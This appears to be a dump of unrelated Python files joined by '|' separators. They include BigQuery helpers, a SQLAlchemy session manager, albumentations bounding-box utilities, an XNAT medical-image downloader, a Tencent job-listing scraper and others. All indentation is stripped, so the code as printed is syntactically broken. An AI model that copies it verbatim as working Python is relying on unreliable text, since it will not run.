errors = client.insert_rows(table, rows)
except:
print('Table {} does not exist'.format(table_id))
def query_table(project, query):
try:
QUERY = (query)
client = bigquery.Client(project=project)
query_job = client.query(QUERY)
rows = query_job.result()
for row in rows:
print(row)
except:
print('Table {} does not exist'.format(table_id))
def delete_table(project, dataset_id, table_id):
try:
client = bigquery.Client(project=project)
table_ref = client.dataset(dataset_id).table(table_id)
client.delete_table(table_ref)
print('Table {}:{} deleted'.format(dataset_id, table_id))
except:
print('Table {}:{} does not exist'.format(dataset_id, table_id))
def extract_table_to_gcs(project, dataset_id, table_id, destination_uri):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
extract_job = client.extract_table(table_ref, destination_uri, location='US')
extract_job.result()
print('Exported {}:{}.{} to {}'.format(project, dataset_id, table_id, destination_uri))
except:
print('Could not export {}:{}.{} to {}'.format(project, dataset_id, table_id, destination_uri))
def load_gcs_parquet_to_table(project, table_id, dataset_id, uri):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
job_config = bigquery.LoadJobConfig()
job_config.source_format = bigquery.SourceFormat.PARQUET
load_job = client.load_table_from_uri(uri, table_ref, job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
load_job.result()
print('Job finished')
destination_table = client.get_table(table_ref)
print('Loaded {} rows'.format(destination_table.num_rows))
except:
print('Error')
|
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from werkzeug.local import LocalProxy
def get_expected_pathname():
global db_directory
from app.data.get_time import get_date
print ('NAME: path get {}'.format(db_directory + get_date()))
return db_directory + get_date() + '.sql'
from app.configs.constants import db_directory
initial_db_dir = open('data/BACKUPDATA', 'a+').read()
db_path = '[unset]'
prev_path = '[none]'
if (initial_db_dir == ''):
print ('No initial db found')
db_path = ''
else:
db_path = initial_db_dir
class SessionManager(object):
def __init__(self):
self.session = None
def get_session(self):
from app.data.database import db_path, prev_path, set_prev_path
if (db_path == prev_path):
return self.session
else:
print('Updating session path: \'{}\' -> \'{}\''.format(prev_path, db_path))
engine = create_engine('sqlite:///' + db_path, convert_unicode=True)
self.session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
set_prev_path(db_path)
return self.session
def set_prev_path(val):
global prev_path
prev_path = val
def init_db():
global db_path
print ('initializing db...')
import app.data.models
engine = create_engine('sqlite:///' + db_path, convert_unicode=True)
Base.metadata.create_all(bind=engine)
def set_path(new_path):
global db_path, engine, db_session, Base
db_path = new_path
print ('SET: path to {}'.format(db_path))
session_manager = SessionManager()
set_path(db_path)
db_session = LocalProxy(session_manager.get_session)
Base = declarative_base()
Base.query = db_session.query_property()
|
import argparse
import os
import sys
import midi
from time import time
from create_pickle import log_replace
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "src"))
from beatsearch.rhythmcorpus import RhythmCorpus
from beatsearch.utils import print_progress_bar, get_default_beatsearch_rhythms_fpath
def get_args():
parser = argparse.ArgumentParser(description="Exports rhythms to MIDI files")
parser.add_argument("--corpus", type=argparse.FileType('r'),
help="The *.pkl file containing the rhythms to export to MIDI",
default=get_default_beatsearch_rhythms_fpath())
parser.add_argument("--dir", default="./output/midi",
help="Directory to save the MIDI files to")
return parser.parse_args()
if __name__ == "__main__":
args = get_args()
log_replace("Loading rhythms from: %s" % args.corpus.name)
corpus = RhythmCorpus.load(args.corpus)
log_replace("Loaded rhythms from '%s' containing %i rhythms\n" % (args.corpus.name, len(corpus)))
if not os.path.isdir(args.dir):
os.makedirs(args.dir)
rhythm_i = 1
n_rhythms = len(corpus)
t_start = time()
for rhythm in corpus:
print_progress_bar(rhythm_i, n_rhythms,
"Exporting rhythms to MIDI...", "[%i/%i]" %
(rhythm_i, n_rhythms), starting_time=t_start, fill="O")
pattern = rhythm.to_midi()
path = os.path.join(args.dir, "%s.mid" % rhythm.name)
midi.write_midifile(path, pattern)
rhythm_i += 1
|
from __future__ import unicode_literals
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
def get_secure_cache_opts():
if hasattr(settings, 'DJANGO_REDIS_SECURE_CACHE_NAME'):
cache_name = settings.DJANGO_REDIS_SECURE_CACHE_NAME
else:
cache_name = 'default'
secure_cache_options_settings = settings.CACHES[cache_name].get('OPTIONS')
if not secure_cache_options_settings:
raise ImproperlyConfigured(
'OPTIONS must be defined in settings in secure cache settings!')
if secure_cache_options_settings['SERIALIZER'] == 'secure_redis.serializer.SecureSerializer':
return secure_cache_options_settings
secure_cache_options_settings = get_secure_cache_opts()
if secure_cache_options_settings:
if not secure_cache_options_settings.get('REDIS_SECRET_KEY'):
raise ImproperlyConfigured(
'REDIS_SECRET_KEY must be defined in settings in secure cache OPTIONS')
|
special.eval_chebyt(n, x)
|
from logger.Logger import Logger
from MorseCoder import MorseCoder
from Utils import Utils
class Main:
__logger = Logger()
def __init__(self):
self.__logger.clear_logs()
def __get_next_command(self):
legal_commands = {
"encode": ["encode", "1"],
"decode": ["decode", "2"],
"exit": ["exit", "3", "q"],
}
self.__logger.info("You are now in the main menu.")
self.__logger.info("Legal commands: 'encode' | 'decode' | 'exit'")
input_command = input("Please enter a command: \n").lower()
Utils().clear_terminal()
if input_command in legal_commands["encode"]:
return "encode"
elif input_command in legal_commands["decode"]:
return "decode"
elif input_command in legal_commands["exit"]:
return "exit"
else:
self.__logger.warning("Illegal command: ", input_command)
self.__logger.warning("Please try again...")
return self.__get_next_command()
def main(self):
morse_coder = MorseCoder()
try:
command = self.__get_next_command()
if command == "encode":
morse_coder.start_encode_mode()
elif command == "decode":
morse_coder.start_decode_mode()
else:
quit()
except KeyboardInterrupt:
return self.main()
if __name__ == "__main__":
Main().main()
|
#!/usr/bin/env python
# Copyright 2016-2021 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import xnat
import os
import sys
import shutil
from glob import glob
import argparse
from xnat.exceptions import XNATResponseError
# General settings
valid_datasets = ['Lipo', 'Desmoid', 'GIST', 'Liver', 'CRLM', 'Melanoma']
def main():
parser = argparse.ArgumentParser(description='WORC Database experiments')
parser.add_argument('-dataset', '--dataset', metavar='dataset',
dest='dataset', type=str, required=False,
default='Lipo',
help='Name of dataset to be downloaded.')
parser.add_argument('-datafolder', '--datafolder', metavar='datafolder',
dest='datafolder', type=str, required=False,
help='Folder to download the dataset to.')
parser.add_argument('-nsubjects', '--nsubjects', metavar='nsubjects',
dest='nsubjects', type=str, required=False,
default='all',
help='Number of subjects to be downloaded.')
args = parser.parse_args()
# Run the experiment
download_WORCDatabase(dataset=args.dataset,
datafolder=args.datafolder,
nsubjects=args.nsubjects)
def download_subject(project, subject, datafolder, session, verbose=False):
"""Download data of a single XNAT subject."""
# Download all data and keep track of resources
download_counter = 0
resource_labels = list()
for e in subject.experiments:
resmap = {}
experiment = subject.experiments[e]
for s in experiment.scans:
scan = experiment.scans[s]
print(("\tDownloading patient {}, experiment {}, scan {}.").format(subject.label, experiment.label,
scan.id))
for res in scan.resources:
resource_label = scan.resources[res].label
if resource_label == 'NIFTI':
# Create output directory
outdir = datafolder + '/{}'.format(subject.label)
if not os.path.exists(outdir):
os.makedirs(outdir)
resmap[resource_label] = scan
print(f'resource is {resource_label}')
scan.resources[res].download_dir(outdir)
resource_labels.append(resource_label)
download_counter += 1
# Parse resources and throw warnings if they not meet the requirements
subject_name = subject.label
if download_counter == 0:
print(f'\t[WARNING] Skipping subject {subject_name}: no (suitable) resources found.')
return False
if 'NIFTI' not in resource_labels:
print(f'\t[WARNING] Skipping subject {subject_name}: no NIFTI resources found.')
return False
# Reorder files to a easier to read structure
NIFTI_files = glob(os.path.join(outdir, '*', 'scans', '*', 'resources', 'NIFTI', 'files', '*.nii.gz'))
for NIFTI_file in NIFTI_files:
basename = os.path.basename(NIFTI_file)
shutil.move(NIFTI_file, os.path.join(outdir, basename))
for folder in glob(os.path.join(outdir, '*')):
if os.path.isdir(folder):
shutil.rmtree(folder)
return True
def download_project(project_name, xnat_url, datafolder, nsubjects='all',
verbose=True, dataset='all'):
"""Download data of full XNAT project."""
# Connect to XNAT and retreive project
with xnat.connect(xnat_url) as session:
project = session.projects[project_name]
# Create the data folder if it does not exist yet
datafolder = os.path.join(datafolder, project_name)
if not os.path.exists(datafolder):
os.makedirs(datafolder)
subjects_len = len(project.subjects)
if nsubjects != 'all':
nsubjects = min(nsubjects, subjects_len)
subjects_counter = 1
downloaded_subjects_counter = 0
for s in range(0, subjects_len):
s = project.subjects[s]
if dataset is not 'all':
# Check if patient belongs to required dataset
subject_dataset = s.fields['dataset']
if subject_dataset != dataset:
print(f'\t Skipping subject {s.label}: belongs to a different dataset than {dataset}.')
continue
print(f'Processing on subject {subjects_counter}/{subjects_len}')
subjects_counter += 1
success = download_subject(project_name, s, datafolder, session,
verbose)
if success:
downloaded_subjects_counter += 1
# Stop downloading if we have reached the required number of subjects
if downloaded_subjects_counter == nsubjects:
break
# Disconnect the session
session.disconnect()
if nsubjects != 'all':
if downloaded_subjects_counter < nsubjects:
raise ValueError(f'Number of subjects downloaded {downloaded_subjects_counter} is smaller than the number required {nsubjects}.')
print('Done downloading!')
def download_WORCDatabase(dataset=None, datafolder=None, nsubjects='all'):
"""Download a dataset from the WORC Database.
Download all Nifti images and segmentations from a dataset from the WORC
database from https://xnat.bmia.nl/data/projects/worc
dataset: string, default None
If None, download the full XNAT project. If string, download one
of the six datasets. Valid values: Lipo, Desmoid, GIST, Liver, CRLM,
Melanoma
"""
# Check if dataset is valid
if dataset not in valid_datasets:
raise KeyError(f"{dataset} is not a valid dataset, should be one of {valid_datasets}.")
if datafolder is None:
# Download data to path in which this script is located + Data
cwd = os.getcwd()
datafolder = os.path.join(cwd, 'Data')
if not os.path.exists(datafolder):
os.makedirs(datafolder)
xnat_url = 'https://xnat.bmia.nl'
project_name = 'worc'
download_project(project_name, xnat_url, datafolder, nsubjects=nsubjects,
verbose=True, dataset=dataset)
if __name__ == '__main__':
main()
|
import sys
import sip
from PyQt4 import QtGui, QtCore
from epubcreator.gui import main_window
from epubcreator import config, version
if __name__ == "__main__":
# Necesito llamar a este método porque sino pyqt crashea cuando se cierra python (al menos en windows).
# No crashea siempre, sino que lo hace bajo alguna circunstancias. Por ejemplo, a mi me crasheaba cuando el form
# tenía cerca de 11 o 12 widgets.
# http://pyqt.sourceforge.net/Docs/PyQt5/pyqt4_differences.html, dice lo siguiente:
# When the Python interpreter exits PyQt4 (by default) calls the C++ destructor of all wrapped instances
# that it owns. This happens in a random order and can therefore cause the interpreter to crash. This behavior
# can be disabled by calling the sip.setdestroyonexit() function.
# PyQt5 always calls sip.setdestroyonexit() automatically.
sip.setdestroyonexit(False)
QtGui.QApplication.setDesktopSettingsAware(True)
app = QtGui.QApplication(sys.argv)
app.setWindowIcon(QtGui.QIcon(":/epublibre_logo.png"))
# Intento cargar las traducciones a español para todos los diálogos, botones, etc., estándares de Qt.
qtTranslator = QtCore.QTranslator()
if qtTranslator.load(config.getQtSpanishTranslation()):
app.installTranslator(qtTranslator)
QtCore.QCoreApplication.setApplicationName(version.APP_NAME)
QtCore.QCoreApplication.setOrganizationName(version.ORGANIZATION)
QtCore.QCoreApplication.setOrganizationDomain(version.ORGANIZATION_DOMAIN)
QtCore.QCoreApplication.setApplicationVersion(version.VERSION)
mainWindow = main_window.MainWindow()
mainWindow.show()
sys.exit(app.exec_())
|
'''
Using freeforexapi.com API to get some basic
currency-conversion pairings in real-time.
'''
from urllib.request import urlopen
import json
'''
List of all possible currency pairings
available on this API.
'''
def get_api_key():
with open('keys.json','r') as keys:
data = json.load(keys)
api_key = data['api_key']
return api_key
def get_currency_pairs():
'''
THIS STILL NEEDS WORK TO PUT TOGETHER
EVERY POSSIBLE CURRENCY COMBINATION.
'''
api_key = get_api_key()
url = f'https://free.currconv.com/api/v7/currencies?apiKey={api_key}'
with urlopen(url) as response:
source = response.read()
data = json.loads(source)
currencies = []
for currency in data['results']:
currencies.append(currency)
pairs = []
i = 1
for currency in currencies:
while i < len(currencies):
pairs.append(f'{currency}_{currencies[i]}')
i+=1
return pairs
pairs = [
"EUR_USD",
"EUR_GBP",
"GBP_USD",
"USD_JPY",
"AUD_USD",
"USD_CHF",
"NZD_USD",
"USD_CAD",
"USD_ZAR"
]
def get_currency(req_pair):
api_key = get_api_key()
url = (
'https://free.currconv.com/api/v7/convert'
f'?q={req_pair}'
'&compact=ultra'
f'&apiKey={api_key}'
)
with urlopen(url) as response:
source = response.read()
data = json.loads(source)
print(data)
def tests():
for pair in pairs:
get_currency(pair)
# tests()
get_currency_pairs()
|
from .client import qBittorrentClient
|
from __future__ import division
from albumentations.core.utils import DataProcessor
import numpy as np
__all__ = [
"normalize_bbox",
"denormalize_bbox",
"normalize_bboxes",
"denormalize_bboxes",
"calculate_bbox_area",
"filter_bboxes_by_visibility",
"convert_bbox_to_albumentations",
"convert_bbox_from_albumentations",
"convert_bboxes_to_albumentations",
"convert_bboxes_from_albumentations",
"BboxProcessor",
]
class BboxProcessor(DataProcessor):
@property
def default_data_name(self):
return "bboxes"
def ensure_data_valid(self, data):
for data_name in self.data_fields:
data_exists = data_name in data and len(data[data_name])
if data_exists and len(data[data_name][0]) < 5:
if self.params.label_fields is None:
raise ValueError(
"Please specify 'label_fields' in 'bbox_params' or add labels to the end of bbox "
"because bboxes must have labels"
)
if self.params.label_fields:
if not all(l in data.keys() for l in self.params.label_fields):
raise ValueError("Your 'label_fields' are not valid - them must have same names as params in dict")
def filter(self, data, rows, cols):
return filter_bboxes(
data, rows, cols, min_area=self.params.min_area, min_visibility=self.params.min_visibility
)
def check(self, data, rows, cols):
return check_bboxes(data)
def convert_from_albumentations(self, data, rows, cols):
return convert_bboxes_from_albumentations(data, self.params.format, rows, cols, check_validity=True)
def convert_to_albumentations(self, data, rows, cols):
return convert_bboxes_to_albumentations(data, self.params.format, rows, cols, check_validity=True)
def normalize_bbox(bbox, rows, cols):
"""Normalize coordinates of a bounding box. Divide x-coordinates by image width and y-coordinates
by image height.
Args:
bbox (tuple): Denormalized bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
Returns:
tuple: Normalized bounding box `(x_min, y_min, x_max, y_max)`.
Raises:
ValueError: If rows or cols is less or equal zero
"""
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
if rows <= 0:
raise ValueError("Argument rows must be positive integer")
if cols <= 0:
raise ValueError("Argument cols must be positive integer")
x_min, x_max = x_min / cols, x_max / cols
y_min, y_max = y_min / rows, y_max / rows
return (x_min, y_min, x_max, y_max) + tail
def denormalize_bbox(bbox, rows, cols):
"""Denormalize coordinates of a bounding box. Multiply x-coordinates by image width and y-coordinates
by image height. This is an inverse operation for :func:`~albumentations.augmentations.bbox.normalize_bbox`.
Args:
bbox (tuple): Normalized bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
Returns:
tuple: Denormalized bounding box `(x_min, y_min, x_max, y_max)`.
Raises:
ValueError: If rows or cols is less or equal zero
"""
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
if rows <= 0:
raise ValueError("Argument rows must be positive integer")
if cols <= 0:
raise ValueError("Argument cols must be positive integer")
x_min, x_max = x_min * cols, x_max * cols
y_min, y_max = y_min * rows, y_max * rows
return (x_min, y_min, x_max, y_max) + tail
def normalize_bboxes(bboxes, rows, cols):
"""Normalize a list of bounding boxes.
Args:
bboxes (List[tuple]): Denormalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
rows (int): Image height.
cols (int): Image width.
Returns:
List[tuple]: Normalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
"""
return [normalize_bbox(bbox, rows, cols) for bbox in bboxes]
def denormalize_bboxes(bboxes, rows, cols):
"""Denormalize a list of bounding boxes.
Args:
bboxes (List[tuple]): Normalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
rows (int): Image height.
cols (int): Image width.
Returns:
List[tuple]: Denormalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
"""
return [denormalize_bbox(bbox, rows, cols) for bbox in bboxes]
def calculate_bbox_area(bbox, rows, cols):
"""Calculate the area of a bounding box in pixels.
Args:
bbox (tuple): A bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
Return:
int: Area of a bounding box in pixels.
"""
bbox = denormalize_bbox(bbox, rows, cols)
x_min, y_min, x_max, y_max = bbox[:4]
area = (x_max - x_min) * (y_max - y_min)
return area
def filter_bboxes_by_visibility(
original_shape, bboxes, transformed_shape, transformed_bboxes, threshold=0.0, min_area=0.0
):
"""Filter bounding boxes and return only those boxes whose visibility after transformation is above
the threshold and minimal area of bounding box in pixels is more then min_area.
Args:
original_shape (tuple): Original image shape `(height, width)`.
bboxes (List[tuple]): Original bounding boxes `[(x_min, y_min, x_max, y_max)]`.
transformed_shape (tuple): Transformed image shape `(height, width)`.
transformed_bboxes (List[tuple]): Transformed bounding boxes `[(x_min, y_min, x_max, y_max)]`.
threshold (float): visibility threshold. Should be a value in the range [0.0, 1.0].
min_area (float): Minimal area threshold.
Returns:
List[tuple]: Filtered bounding boxes `[(x_min, y_min, x_max, y_max)]`.
"""
img_height, img_width = original_shape[:2]
transformed_img_height, transformed_img_width = transformed_shape[:2]
visible_bboxes = []
for bbox, transformed_bbox in zip(bboxes, transformed_bboxes):
if not all(0.0 <= value <= 1.0 for value in transformed_bbox[:4]):
continue
bbox_area = calculate_bbox_area(bbox, img_height, img_width)
transformed_bbox_area = calculate_bbox_area(transformed_bbox, transformed_img_height, transformed_img_width)
if transformed_bbox_area < min_area:
continue
visibility = transformed_bbox_area / bbox_area
if visibility >= threshold:
visible_bboxes.append(transformed_bbox)
return visible_bboxes
def convert_bbox_to_albumentations(bbox, source_format, rows, cols, check_validity=False):
"""Convert a bounding box from a format specified in `source_format` to the format used by albumentations:
normalized coordinates of bottom-left and top-right corners of the bounding box in a form of
`(x_min, y_min, x_max, y_max)` e.g. `(0.15, 0.27, 0.67, 0.5)`.
Args:
bbox (tuple): A bounding box tuple.
source_format (str): format of the bounding box. Should be 'coco', 'pascal_voc', or 'yolo'.
check_validity (bool): Check if all boxes are valid boxes.
rows (int): Image height.
cols (int): Image width.
Returns:
tuple: A bounding box `(x_min, y_min, x_max, y_max)`.
Note:
The `coco` format of a bounding box looks like `(x_min, y_min, width, height)`, e.g. (97, 12, 150, 200).
The `pascal_voc` format of a bounding box looks like `(x_min, y_min, x_max, y_max)`, e.g. (97, 12, 247, 212).
The `yolo` format of a bounding box looks like `(x, y, width, height)`, e.g. (0.3, 0.1, 0.05, 0.07);
where `x`, `y` coordinates of the center of the box, all values normalized to 1 by image height and width.
Raises:
ValueError: if `target_format` is not equal to `coco` or `pascal_voc`, ot `yolo`.
ValueError: If in YOLO format all labels not in range (0, 1).
"""
if source_format not in {"coco", "pascal_voc", "yolo"}:
raise ValueError(
"Unknown source_format {}. Supported formats are: 'coco', 'pascal_voc' and 'yolo'".format(source_format)
)
if isinstance(bbox, np.ndarray):
bbox = bbox.tolist()
if source_format == "coco":
(x_min, y_min, width, height), tail = bbox[:4], tuple(bbox[4:])
x_max = x_min + width
y_max = y_min + height
elif source_format == "yolo":
# https://github.com/pjreddie/darknet/blob/f6d861736038da22c9eb0739dca84003c5a5e275/scripts/voc_label.py#L12
bbox, tail = bbox[:4], tuple(bbox[4:])
_bbox = np.array(bbox[:4])
if np.any((_bbox <= 0) | (_bbox > 1)):
raise ValueError("In YOLO format all labels must be float and in range (0, 1]")
x, y, width, height = np.round(denormalize_bbox(bbox, rows, cols))
x_min = x - width / 2 + 1
x_max = x_min + width
y_min = y - height / 2 + 1
y_max = y_min + height
else:
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
bbox = (x_min, y_min, x_max, y_max) + tail
bbox = normalize_bbox(bbox, rows, cols)
if check_validity:
check_bbox(bbox)
return bbox
def convert_bbox_from_albumentations(bbox, target_format, rows, cols, check_validity=False):
"""Convert a bounding box from the format used by albumentations to a format, specified in `target_format`.
Args:
bbox (tuple): An albumentation bounding box `(x_min, y_min, x_max, y_max)`.
target_format (str): required format of the output bounding box. Should be 'coco', 'pascal_voc' or 'yolo'.
rows (int): Image height.
cols (int): Image width.
check_validity (bool): Check if all boxes are valid boxes.
Returns:
tuple: A bounding box.
Note:
The `coco` format of a bounding box looks like `[x_min, y_min, width, height]`, e.g. [97, 12, 150, 200].
The `pascal_voc` format of a bounding box looks like `[x_min, y_min, x_max, y_max]`, e.g. [97, 12, 247, 212].
The `yolo` format of a bounding box looks like `[x, y, width, height]`, e.g. [0.3, 0.1, 0.05, 0.07].
Raises:
ValueError: if `target_format` is not equal to `coco`, `pascal_voc` or `yolo`.
"""
if target_format not in {"coco", "pascal_voc", "yolo"}:
raise ValueError(
"Unknown target_format {}. Supported formats are: 'coco', 'pascal_voc' and 'yolo'".format(target_format)
)
if check_validity:
check_bbox(bbox)
bbox = denormalize_bbox(bbox, rows, cols)
if target_format == "coco":
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
width = x_max - x_min
height = y_max - y_min
bbox = (x_min, y_min, width, height) + tail
elif target_format == "yolo":
# https://github.com/pjreddie/darknet/blob/f6d861736038da22c9eb0739dca84003c5a5e275/scripts/voc_label.py#L12
(x_min, y_min, x_max, y_max), tail = bbox[:4], bbox[4:]
x = (x_min + x_max) / 2 - 1
y = (y_min + y_max) / 2 - 1
width = x_max - x_min
height = y_max - y_min
bbox = normalize_bbox((x, y, width, height) + tail, rows, cols)
return bbox
def convert_bboxes_to_albumentations(bboxes, source_format, rows, cols, check_validity=False):
"""Convert a list bounding boxes from a format specified in `source_format` to the format used by albumentations
"""
return [convert_bbox_to_albumentations(bbox, source_format, rows, cols, check_validity) for bbox in bboxes]
def convert_bboxes_from_albumentations(bboxes, target_format, rows, cols, check_validity=False):
"""Convert a list of bounding boxes from the format used by albumentations to a format, specified
in `target_format`.
Args:
bboxes (List[tuple]): List of albumentation bounding box `(x_min, y_min, x_max, y_max)`.
target_format (str): required format of the output bounding box. Should be 'coco', 'pascal_voc' or 'yolo'.
rows (int): Image height.
cols (int): Image width.
check_validity (bool): Check if all boxes are valid boxes.
Returns:
list[tuple]: List of bounding box.
"""
return [convert_bbox_from_albumentations(bbox, target_format, rows, cols, check_validity) for bbox in bboxes]
def check_bbox(bbox):
"""Check if bbox boundaries are in range 0, 1 and minimums are lesser then maximums"""
for name, value in zip(["x_min", "y_min", "x_max", "y_max"], bbox[:4]):
if not 0 <= value <= 1:
raise ValueError(
"Expected {name} for bbox {bbox} "
"to be in the range [0.0, 1.0], got {value}.".format(bbox=bbox, name=name, value=value)
)
x_min, y_min, x_max, y_max = bbox[:4]
if x_max <= x_min:
raise ValueError("x_max is less than or equal to x_min for bbox {bbox}.".format(bbox=bbox))
if y_max <= y_min:
raise ValueError("y_max is less than or equal to y_min for bbox {bbox}.".format(bbox=bbox))
def check_bboxes(bboxes):
"""Check if bboxes boundaries are in range 0, 1 and minimums are lesser then maximums"""
for bbox in bboxes:
check_bbox(bbox)
def filter_bboxes(bboxes, rows, cols, min_area=0.0, min_visibility=0.0):
"""Remove bounding boxes that either lie outside of the visible area by more then min_visibility
or whose area in pixels is under the threshold set by `min_area`. Also it crops boxes to final image size.
Args:
bboxes (List[tuple]): List of albumentation bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
min_area (float): Minimum area of a bounding box. All bounding boxes whose visible area in pixels.
is less than this value will be removed. Default: 0.0.
min_visibility (float): Minimum fraction of area for a bounding box to remain this box in list. Default: 0.0.
Returns:
List[tuple]: List of bounding box.
"""
resulting_boxes = []
for bbox in bboxes:
transformed_box_area = calculate_bbox_area(bbox, rows, cols)
bbox, tail = tuple(np.clip(bbox[:4], 0, 1.0)), tuple(bbox[4:])
clipped_box_area = calculate_bbox_area(bbox, rows, cols)
if not transformed_box_area or clipped_box_area / transformed_box_area <= min_visibility:
continue
else:
bbox = tuple(np.clip(bbox[:4], 0, 1.0))
if calculate_bbox_area(bbox, rows, cols) <= min_area:
continue
resulting_boxes.append(bbox + tail)
return resulting_boxes
def union_of_bboxes(height, width, bboxes, erosion_rate=0.0):
"""Calculate union of bounding boxes.
Args:
height (float): Height of image or space.
width (float): Width of image or space.
bboxes (List[tuple]): List like bounding boxes. Format is `[(x_min, y_min, x_max, y_max)]`.
erosion_rate (float): How much each bounding box can be shrinked, useful for erosive cropping.
Set this in range [0, 1]. 0 will not be erosive at all, 1.0 can make any bbox to lose its volume.
Returns:
tuple: A bounding box `(x_min, y_min, x_max, y_max)`.
"""
x1, y1 = width, height
x2, y2 = 0, 0
for bbox in bboxes:
x_min, y_min, x_max, y_max = bbox[:4]
w, h = x_max - x_min, y_max - y_min
lim_x1, lim_y1 = x_min + erosion_rate * w, y_min + erosion_rate * h
lim_x2, lim_y2 = x_max - erosion_rate * w, y_max - erosion_rate * h
x1, y1 = np.min([x1, lim_x1]), np.min([y1, lim_y1])
x2, y2 = np.max([x2, lim_x2]), np.max([y2, lim_y2])
return x1, y1, x2, y2
|
__all__ = [
"LaMetricManager", "SimpleFrame", "GoalFrame", "SpikeChart",
"Sound", "Model", "CloudSession", "LocalSession"
]
from .lmnotify import LaMetricManager
from .models import SimpleFrame, GoalFrame, SpikeChart, Sound, Model
from .session import CloudSession, LocalSession
|
#!/usr/bin/env python
import sys
import numpy as np
import cv2
print sys.argv[1]
img = cv2.imread(sys.argv[1],0)
img1 = cv2.imread(sys.argv[1],0)
numnonzerorows = (img !=0).sum(1)
zeroindexvec = np.where(numnonzerorows == 0)[0]
img = np.delete(img,zeroindexvec, axis=0)
img = img.transpose()
numnonzerorows = (img !=0).sum(1)
zeroindexvec = np.where(numnonzerorows == 0)[0]
img = np.delete(img,zeroindexvec, axis=0)
img = img.transpose()
print 'Before:'
print img1.shape
print 'After:'
print img.shape
img = cv2.resize(img, (224,224)) # Crop from x, y, w, h -> 100, 200, 300, 400
print 'Image resize'
print img.shape
cv2.imwrite(sys.argv[1],img)
|
#encoding: utf-8
import time
import json
import random
import requests
ua_list = [
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)',
]
class TencentSpider(object):
def __init__(self):
self.one_url = 'https://careers.tencent.com/tencentcareer/api/post/Query?timestamp=1563912271089&countryId=&cityId=&bgIds=&productId=&categoryId=&parentCategoryId=&attrId=&keyword=&pageIndex={}&pageSize=10&language=zh-cn&area=cn'
self.two_url = 'https://careers.tencent.com/tencentcareer/api/post/ByPostId?timestamp=1563912374645&postId={}&language=zh-cn'
self.f = open('tencent.json', 'a') # 打开文件
self.item_list = [] # 存放抓取的item字典数据
# 获取响应内容函数
def get_page(self, url):
headers = {'User-Agent': random.choice(ua_list)}
html = requests.get(url=url, headers=headers).text
html = json.loads(html) # json格式字符串转为Python数据类型
return html
# 主线函数: 获取所有数据
def parse_page(self, one_url):
html = self.get_page(one_url)
item = {}
for job in html['Data']['Posts']:
item['name'] = job['RecruitPostName'] # 名称
post_id = job['PostId'] # postId,拿postid为了拼接二级页面地址
# 拼接二级地址,获取职责和要求
two_url = self.two_url.format(post_id)
item['duty'], item['require'] = self.parse_two_page(two_url)
print(item)
self.item_list.append(item) # 添加到大列表中
# 解析二级页面函数
def parse_two_page(self, two_url):
html = self.get_page(two_url)
duty = html['Data']['Responsibility'] # 工作责任
duty = duty.replace('\r\n', '').replace('\n', '') # 去掉换行
require = html['Data']['Requirement'] # 工作要求
require = require.replace('\r\n', '').replace('\n', '') # 去掉换行
return duty, require
# 获取总页数
def get_numbers(self):
url = self.one_url.format(1)
html = self.get_page(url)
numbers = int(html['Data']['Count']) // 10 + 1 # 每页有10个推荐
return numbers
def main(self):
number = self.get_numbers()
for page in range(1, 3):
one_url = self.one_url.format(page)
self.parse_page(one_url)
# 保存到本地json文件:json.dump
json.dump(self.item_list, self.f, ensure_ascii=False)
self.f.close()
if __name__ == '__main__':
start = time.time()
spider = TencentSpider()
spider.main()
end = time.time()
print('执行时间:%.2f' % (end - start))
|
"""
SMT-based Model Checking Module for RS with Concentrations and Context Automaton
"""
from z3 import *
from time import time
from sys import stdout
from itertools import chain
import resource
from colour import *
from logics import rsLTL_Encoder
from logics import ParamConstr_Encoder
from rs.reaction_system_with_concentrations_param import ParameterObj, is_param
# def simplify(x):
# return x
def z3_max(a, b):
return If(a > b, a, b)
class SmtCheckerRSCParam(object):
def __init__(self, rsca, optimise=False):
rsca.sanity_check()
if not rsca.is_concentr_and_param_compatible():
raise RuntimeError(
"RS and CA with concentrations (and parameters) expected")
self.rs = rsca.rs
self.ca = rsca.ca
self.optimise = optimise
self.initialise()
def initialise(self):
"""Initialises all the variables used by the checker"""
